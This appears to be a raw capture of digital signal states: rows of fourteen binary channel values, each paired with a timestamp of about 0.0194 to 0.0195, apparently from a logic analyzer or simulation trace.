1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394672e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394696e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394724e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394748e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394772e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394796e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394820e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9394828e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9394872e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9394896e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394904e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394924e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394948e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9394972e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9394996e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395020e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395044e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395072e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395096e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395116e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395144e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395168e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9395196e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9395244e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9395268e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395276e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395296e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395316e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395344e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395368e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395396e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395420e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395444e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395468e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395496e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395516e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395544e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395568e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395620e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395644e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395668e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395696e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395716e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395744e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395768e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9395772e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9395820e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9395844e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395852e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395868e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395896e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395916e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395948e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9395972e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9395996e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396020e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396044e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396072e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396096e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396124e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396148e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396196e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396220e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396244e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396272e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396296e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396324e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396348e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396396e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396420e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9396428e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.9396444e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.9396472e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.9396476e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396480e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396496e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396524e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396572e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396620e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396644e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396672e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396696e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396724e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396748e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396772e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396796e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396820e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396844e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396872e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396896e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396924e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9396972e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9396996e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397020e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397044e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397072e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397096e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397124e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397148e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397172e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397196e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397220e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397244e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397272e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397296e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397324e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397372e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397396e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397420e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397444e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397472e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397496e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397524e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397572e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397620e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.9397644e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.9397672e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.9522344e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.9522536e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9522556e-02 0,0,1,0,0,0,0,0,0,0,0,1,0,1,1.9522588e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9522612e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.9522892e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9522924e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.9522944e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9522972e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.9522996e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9523020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.9523068e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9523092e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,1.9523100e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,1,1.9523120e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,1.9523144e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9523152e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,1.9523168e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523180e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523196e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523244e-02 0,0,1,0,0,0,0,0,0,1,0,0,0,0,1.9523248e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9523252e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9523292e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9523320e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9523324e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523328e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523344e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523372e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523420e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523444e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523492e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523520e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523596e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523620e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523644e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523668e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523692e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9523700e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9523740e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9523768e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9523772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523776e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523792e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523820e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523844e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523868e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523892e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523920e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523940e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9523964e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9523992e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524044e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524068e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524092e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524116e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524144e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524164e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524196e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524220e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524268e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524292e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9524300e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9524320e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9524344e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524352e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524372e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524396e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524420e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524444e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524468e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524492e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524520e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524544e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524596e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524620e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524644e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524668e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524692e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524720e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524744e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524796e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524820e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524844e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9524848e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9524892e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9524920e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9524924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524928e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524944e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9524972e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9524996e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525044e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525068e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9525076e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9525120e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9525144e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525152e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525172e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525196e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525244e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525292e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525320e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9525324e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9525344e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9525372e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9525376e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525380e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525396e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525420e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9525424e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9525472e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9525496e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525504e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525548e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525596e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525620e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525644e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525700e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525724e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525796e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525848e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525872e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9525972e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9525996e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526020e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526044e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526072e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526096e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526148e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526172e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526196e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526244e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526272e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526296e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526324e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526348e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526372e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526396e-02 0,0,1,0,0,0,0,0,0,1,0,0,0,0,1.9526400e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9526404e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9526448e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9526472e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9526476e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526480e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526496e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526524e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526596e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526648e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526672e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526796e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526820e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526844e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526868e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526896e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9526948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9526972e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9526996e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9527044e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9527068e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527076e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527092e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527124e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527144e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527172e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527196e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527220e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527244e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527268e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527292e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527324e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527344e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9527372e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9527420e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9527444e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527452e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527468e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527492e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527544e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527596e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527644e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527668e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527692e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527724e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527796e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527844e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527868e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527944e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9527972e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9527996e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528020e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528044e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9528052e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9528092e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9528124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528128e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528144e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528172e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528196e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528220e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528244e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528268e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528324e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528344e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528372e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528396e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528420e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528444e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528468e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528492e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528544e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528596e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528644e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528668e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9528676e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9528692e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9528724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528728e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528744e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528772e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528796e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528820e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528868e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528892e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9528944e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9528996e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529068e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529096e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529148e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529172e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529196e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529224e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529244e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529272e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529296e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529324e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529372e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529396e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529420e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529444e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529472e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529496e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529524e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529548e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529572e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529596e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529620e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529644e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529672e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529696e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529724e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529748e-02 